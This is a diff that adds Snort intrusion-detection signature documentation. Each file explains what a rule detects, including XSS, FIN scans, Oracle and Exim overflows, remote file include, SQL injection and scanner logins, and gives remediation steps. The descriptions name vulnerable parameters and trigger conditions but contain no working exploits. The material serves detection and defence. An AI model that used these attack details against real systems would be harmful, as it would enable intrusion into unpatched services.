+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1835.txt
@@ -0,0 +1,81 @@
+Rule:
+
+--
+Sid:
+1835
+
+--
+Summary:
+This event is generated when a cross-site scripting attack is being 
+attempted, or a potential attacker is testing your site to determine if 
+it is vulnerable.
+
+--
+Impact:
+Successful cross-site scripting attacks generally target the users of 
+your web site. Attackers can potentially gain access to your users' 
+cookies or session ids, allowing the attacker to impersonate your
+user. They could also set up elaborate fake logon screens to steal 
+user names and passwords.
+
+--
+Detailed Information:
+Whenever a web application accepts input (either via the URL or the 
+POST method) and then uses that input as part of the HTML of a new page 
+without filtering, the application is vulnerable to cross-site 
+scripting.  The traditional means of exploiting this is to embed a 
+"<SCRIPT>" tag into the input. The code following the tag is then 
+executed by the victim's browser.
+
+--
+Affected Systems:
+Many older versions of web server software are affected, as are numerous
+web applications.
+
+--
+Attack Scenarios:
+The most common avenue of attack is for the attacker to send an HTML 
+formatted email to the victim. The email will contain a link to a 
+specially crafted URL which contains the exploit. When the victim clicks
+on the link, they are directed to the vulnerable web site and the attack
+code is executed by their browser.
+
+--
+Ease of Attack:
+Moderately Easy.  Exploit code exists to automate attacks against users 
+of some widely deployed web applications which are known to be 
+vulnerable. 
+
+Finding vulnerabilities in other, including proprietary, web
+applications is fairly trivial and existing exploit code could easily be
+modified to take advantage of newly discovered vulnerabilities.
+
+--
+False Positives:
+Web pages that legimately include the <SCRIPT> tag could generate this 
+event under certain circumstances.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Determine if your web application is actually vulnerable to this 
+attack. If it is and the application is not of your own design, contact 
+the authors or vendor and see if there is a patch or newer version.
+
+If the application is proprietary to you or your company, ensure that it 
+properly validates input.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Snort documentation contributed by Kevin Peuhkurinen
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/621.txt
@@ -0,0 +1,66 @@
+Rule:
+--
+Sid:
+621
+--
+Summary:
+A tcp packet with only it's FIN flag set was detected.
+
+--
+Impact:
+Information regarding firewall rulesets, open/closed ports, ACLs, and
+possibly even OS type may be disclosed.  This technique can also be
+used to bypass certain firewalls or traffic filtering/shaping devices.
+
+--
+Detailed Information:
+A tcp packet with only it's FIN flag set was detected.  Most Windows
+machines will respond with an ACK-RST regardless of whether or not the
+port is open.  Most *nix systems will respond with an ACK-RST if the
+port is closed and will not respond at all if the port is open.
+Actual responses may vary.
+
+--
+Affected Systems:
+ 
+--
+Attack Scenarios:
+As part of information gathering leading up to another (more directed)
+attack, an attacker may attempt to figure out what ports are
+open/closed on a remote machine.
+
+--
+Ease of Attack:
+Intermediate.  To initiate an attack of this type, an attacker either
+needs a tool that can send packets with only the FIN flag set or
+the ability to craft their own packets.  The former is easy, the later
+requires a more advanced skillset.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Determine if this particular port would have responded as being open
+or closed.  If open, watch for more attacks on this particular service
+or from the remote machine that sent the packet.  If closed, simply
+watch for more traffic from this host.  Consider filtering this type
+of traffic at the ingress points of your network.
+
+--
+Contributors:
+Original rule writer unknown
+Original document author unkown
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Jon Hart <warchild@spoofed.org>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2643.txt
@@ -0,0 +1,73 @@
+Rule:
+
+--
+Sid:
+2643
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in a Oracle database implementation.
+
+--
+Impact:
+Serious. Execution of arbitrary code may be possible. A Denial of
+Service (DoS) condition may also be caused.
+
+--
+Detailed Information:
+Oracle databases may use a built-in procedure to assist in database
+replication. The "ensure_not_published" procedure contains a
+programming error that may allow an attacker to execute a buffer
+overflow attack.
+
+This overflow is triggered by a long string in a parameter for the
+procedure.
+
+If you are running Oracle on a Windows server, make sure that the
+variable $ORACLE_PORTS is set to a value of "any".
+
+--
+Affected Systems:
+        Oracle 9i
+
+--
+Attack Scenarios:
+An attacker can supply a long string to the "fname" variable to
+cause the overflow. The result could permit the attacker to gain
+escalated privileges and run code of their choosing. This attack
+requires an attacker to logon to the database with a valid
+username and password combination.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Matt Watchinski <mwatchinski@sourcefire.com>
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+Other:
+http://www.appsecinc.com/Policy/PolicyCheck96.html
+
+--
--- /dev/null
+++ b/doc/signatures/1557.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1557
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1222.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1222
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/100000721.txt
@@ -0,0 +1,55 @@
+
+
+Rule:
+
+--
+Sid:
+100000721
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "PHPRaid" application running on a webserver. Access to the file "login.php" using a remote file being passed as the "phpraid_dir" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "phpraid_dir" parameter in the "login.php" script used by the "PHPRaid" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using PHPRaid
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/1950.txt
@@ -0,0 +1,54 @@
+Rule:
+
+--
+Sid:
+1950
+
+--
+Summary:
+This event is generated when an attempt is made to register a Remote Procedure Call (RPC) program to the portmapper.  RPC is a facility that enables a machine to request a service from another remote machine. This is done without the need for detailed network information. Some versions of RPC have a vulnerability that allows a remote host to register applications from a spoofed source. 
+
+ -- 
+Impact:
+Attempted remote access.  This may be an attempt to maliciously register a program with the portmapper.
+
+--
+Detailed Information:
+Certain versions of rpcbind portmapper contain a flaw that can allow an attacker capable of spoofing TCP packets to register arbitrary RPC programs. It is possible for the attacker to gain root access depending on the RPC service registered.  
+
+-- 
+Affected Systems: 
+All machines running vulnerable RPC services.
+
+--
+Attack Scenarios:
+The attacker could potentially spoof TCP packets using pmap_set to register an RPC service. 
+
+--
+Ease of Attack:
+Simple.  
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Limit remote access to RPC services.
+
+Filter RPC ports at the firewall to ensure access is denied to RPC-enabled machines.
+
+Disable unneeded RPC services.
+
+--
+Contributors:
+Original rule writer Brian Caswell <bmc@sourcefire.com>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+
+--
--- /dev/null
+++ b/doc/signatures/1466.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1466
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/795.txt
@@ -0,0 +1,62 @@
+
+Rule:  
+
+--
+Sid:
+795
+
+--
+Summary:
+This rule has been placed in deleted.rules. It has been superceded by
+sid 721.
+
+--
+Impact:
+Mail worms may spread rapidly because users execute them.
+
+--
+Detailed Information:
+Windows systems are often configured not to display file extensions.
+By adding a second extension, users get confused and think that an
+executable is a text - e.g. loveletter.txt.vbs gets displayed as
+loveletter.txt but is a visual basic script and not a plain text.
+
+--
+Affected Systems:
+ 
+--
+Attack Scenarios:
+Famous worms (ILOVEYOU, KOURNIKOVA) are based on this method.
+
+--
+Ease of Attack:
+Very easy. One needs to attach a file and hope that it gets executed.
+
+--
+False Positives:
+None Known
+Could be an error on sender's side.
+
+--
+False Negatives:
+None Known
+-
+
+--
+Corrective Action:
+Use antivirus software. Configure mail clients securely, especially when
+using windows desktops. Educate your mail users. Deny all attachments at
+the gateway if you can.
+
+--
+Contributors:
+Original rule writer unknown
+Snort documentation contributed by tobias.haecker@to.com
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+See websites of antivirus companies.
+
+--
--- /dev/null
+++ b/doc/signatures/1829.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+1829
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1090.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1090
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/300.txt
@@ -0,0 +1,56 @@
+Rule:
+
+--
+Sid: 300
+
+--
+Summary:
+This event is generated when a buffer overflow attempt is made against a host running Solaris x86.
+
+--
+Impact:
+System compromize presenting the attacker with the opportunity to
+execute arbitrary code or gain remote access to the victim host.
+
+--
+Detailed Information:
+A buffer overflow condition exists in the nlps_server daemon on certain versions of Solaris for x86 architecture.
+
+nlps_server is a network listener used for printing services. The buffer overflow can be generated by sending an excessively long string of characters to the daemon on port 2766 followed by the command to be executed.
+
+Affected Systems:
+	Solaris 2.4, 2.5 and 2.51 for x86
+
+--
+Attack Scenarios:
+Exploit scripts are available
+
+--
+Ease of Attack:
+Simple. Exploits are available.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+--
+Contributors:
+Original rule writer unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Bugtraq:
+http://www.securityfocus.com/bid/2319
+
+--
--- /dev/null
+++ b/doc/signatures/2592.txt
@@ -0,0 +1,68 @@
+Rule:
+
+
+--
+Sid:
+2592
+
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a buffer overflow
+associated with the Mail Transfer Agent Exim.
+
+--
+Impact:
+A successful attack may allow the execution of arbitrary code on a vulnerable
+server with the privilege of the process running Exim.
+
+--
+Detailed Information:
+Exim is vulnerable to a buffer overflow, permitting an attacker to execute
+arbitrary code.  The vulnerability may be exploited if Exim is configured to
+verify header syntax in the e-mail message body.  This is not the default
+configuration.  If an attacker supplies a large number of spaces after certain
+header fields, it may be possible to cause a buffer overflow.
+
+--
+Affected Systems:
+Exim prior to version 4.34
+
+--
+Attack Scenarios:
+An attacker can create and send mail with a malformed header,
+possibly causing a buffer overflow and permitting the execution of arbitrary code.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+--
+Contributors:
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References
+
+Bugtraq:
+http://www.securityfocus.com/bid/10291
+
+CVE:
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0400
+
+Other:
+http://www.guninski.com/exim1.html
+
+--
--- /dev/null
+++ b/doc/signatures/359.txt
@@ -0,0 +1,73 @@
+Rule:
+
+--
+Sid:
+359
+
+--
+
+Summary:
+This event is generated when an attempt is made to login anonymously 
+into an ftp server using a suspicious password (-satan)
+
+--
+
+Impact:
+Possible unauthorized access. Information gathering.
+
+--
+
+Detailed Information:
+Satan is an open-source security scanner,a predecessor to Saint, which 
+checks for common vulnerabilities. When it detects an open ftp server, 
+it tries to log in anonymously using the password '-satan'
+
+--
+
+Affected Systems:
+Machines running anonymous ftp servers.
+
+--
+
+Attack Scenarios:
+An attacker scans a range of IPs using the Satan Scanner, checking for 
+known vulnerabilities. If the scanner encounters a ftp server, it tries 
+to log in .
+
+--
+
+Ease of Attack:
+Simple.
+
+--
+
+False Positives:
+A user may be using that same password for a legitimate 
+anonymous login.
+
+--
+
+False Negatives:
+None known.
+
+--
+
+Corrective Action:
+Disable anonymous FTP access.
+
+--
+
+Contributors:
+Original Rule Writer Max Vision <vision@whitehats.com>
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Snort documentation contributed by Chaos <c@aufbix.org>
+
+-- 
+
+Additional References:
+
+Arachnids:
+http://www.whitehats.com/info/IDS329
+
+--
--- /dev/null
+++ b/doc/signatures/100000435.txt
@@ -0,0 +1,55 @@
+
+
+Rule:
+
+--
+Sid:
+100000435
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "BlueShoes" application running on a webserver. Access to the file "Bs_Ml_User.class.php" using a remote file being passed as the "GLOBALS[APP][path][core]" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "GLOBALS[APP][path][core]" parameter in the "Bs_Ml_User.class.php" script used by the "BlueShoes" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using BlueShoes
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/100000512.txt
@@ -0,0 +1,75 @@
+Rule:
+
+--
+Sid:
+100000512
+--
+Summary:
+This event is generated when an attempt is made to exploit an SQL injection 
+vulnerability in the "VBZoom" application running on a webserver. Access to the 
+file "lng.php" with SQL commands being passed as the "QuranID" parameter may 
+indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to inject SQL code from a 
+remote machine via the "QuranID" parameter in the "lng.php" script used by the 
+"VBZoom" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to compromise the database backend for the 
+application, the attacker may also be able to execute system binaries or 
+malicious code of their choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using VBZoom
+--
+Attack Scenarios:
+An attacker can inject SQL commands to the backend database for an application 
+if user input is not correctly sanitized or checked before passing that input 
+to the database.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+SQL Injection Attack and Defense
+http://www.securitydocs.com/library/3587
+
+--
+
--- /dev/null
+++ b/doc/signatures/100000169.txt
@@ -0,0 +1,57 @@
+Rule: 
+
+--
+Sid: 
+100000169
+
+-- 
+Summary: 
+The application fingerprinting tool Amap has been detected in HTTP traffic.
+
+--
+Impact:
+An attacker may be attempting to gather information about services on a 
+monitored network, in order to discover vulnerabilities in those services.
+
+--
+Detailed Information:
+Amap is an application fingerprinting tool released by a group of security 
+experts called THC, "The Hacker's Choice"; it is designed to identify services 
+reliably irrespective of the port they are run on. Amap functions by sending 
+"triggers" to open ports on a remote system which are designed to elicit a 
+response from a particular service. This rule is designed to detect the SSL 
+trigger sent by the program.
+
+--
+Affected Systems:
+Any system running an SSL-enabled web server.
+
+--
+Attack Scenarios:
+Attackers will use the Amap application fingerprinting tool.
+
+--
+Ease of Attack:
+Simple, as the program is publicly available and is well-documented.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Check system logs and Snort alert logs for suspicious activity.
+
+--
+Contributors:
+rmkml
+Sourcefire Research Team
+
+--
+Additional References
+
+--
--- /dev/null
+++ b/doc/signatures/511.txt
@@ -0,0 +1,76 @@
+Rule:
+
+--
+Sid:
+511
+
+--
+Summary:
+This event is generated when an attempt is made to gain access to a PC
+running pcAnywhere
+
+--
+Impact:
+Serious. By the very nature of pcAnywhere, without a strong administrative
+password, a successful attack will allow the attacker to gain total 
+control of the machine.
+
+--
+Detailed Information:
+pcAnywhere is a remote control administrative software package produced 
+by Symantec (http://www.symantec.com/pcanywhere/Consumer/features.html) 
+it allows control of a system via network or RAS connection.
+
+--
+Affected Systems:
+	Windows XP Home and Professional
+	Windows 2000 Professional/Server
+	Windows NT Workstation and Server 4.0
+	Windows 98/Me
+
+--
+Attack Scenarios:
+With a copy of pcAnywhere, and attacker can scan a network (port 22) or
+war-dial a series of modems, looking for pcAnywhere signatures.
+
+--
+Ease of Attack:
+Simple. All that is required is an install of pcAnywhere and a host
+to connect to.
+
+--
+False Positives:
+Since pcAnywhere uses the same port as SSH (22) a simple open port scan 
+can show hosts that my not have pcAnywhere installed
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Make sure only servers and workstations that require remote control have
+pcAnywhere installed.
+Make sure that a strong password is required for any level of access, 
+this ideally should be coupled with some for of alternate 
+authentication, such as SecurID, modem callback or be blocked at the 
+external firewall so that the remote control functionality is only 
+available on the protected network.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Snort documentation contributed by  Mike Rivett ebiz@rivett.org
+
+-- 
+Additional References:
+
+RSA:
+RSA SecurID (www.rsasecurity.com/products/securid/)
+
+Arachnids:
+http://www.whitehats.com/info/IDS240
+
+--
--- /dev/null
+++ b/doc/signatures/2321.txt
@@ -0,0 +1,58 @@
+Rule:
+
+--
+Sid:
+2321
+
+--
+Summary:
+This event is generated when an attempt is made to access foxweb.exe, a 
+CGI web application running on a server.
+
+--
+Impact:
+Possible execution of arbitrary code of the attackers choosing.
+
+--
+Detailed Information:
+The FoxWeb application is used to communicate with FoxPro databases. The
+program foxweb.exe contains an error that may allow an attacker to
+execute arbitrary code of their choosing and possibly gain unauthorized
+administrator access to the server.
+
+--
+Affected Systems:
+	FoxWeb 2.5 and prior
+
+--
+Attack Scenarios:
+An attacker can exploit weaknesses to gain access as the administrator by supplying input of
+their choosing to the CGI program.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2501.txt
@@ -0,0 +1,60 @@
+Rule:
+
+--
+Sid:
+2501
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in the Microsoft implementation of SSL Version 3.
+
+--
+Impact:
+Denial of Service (DoS).
+--
+Detailed Information:
+A vulnerability exists in the handling of SSL Version 3 requests that
+can be manipulated to cause a DoS condition in various software 
+implementations used on Microsoft operating systems.
+
+The condition exists because of poor error handling routines in the
+Microsoft Secure Sockets Layer (SSL) library. SSL requests containing an
+invalid field, sent to vulnerable systems can cause the affected host to stop 
+handling any further requests.
+
+--
+Affected Systems:
+	Microsoft Windows 2000, 2003 and XP systems using SSL
+
+--
+Attack Scenarios:
+An attcker needs to make an SSL request to an affected system that
+contains an invalid field.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches
+
+--
+Contributors:
+Sourcefire Research Team
+Matt Watchinski <mwatchinski@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/100000410.txt
@@ -0,0 +1,58 @@
+
+
+Rule:
+
+--
+Sid:
+100000410
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "REDAXO" application running on a webserver. Access to the file "index.inc.php" using a remote file being passed as the "REX[INCLUDE_PATH]" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "REX[INCLUDE_PATH]" parameter in the "index.inc.php" script used by the "REDAXO" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
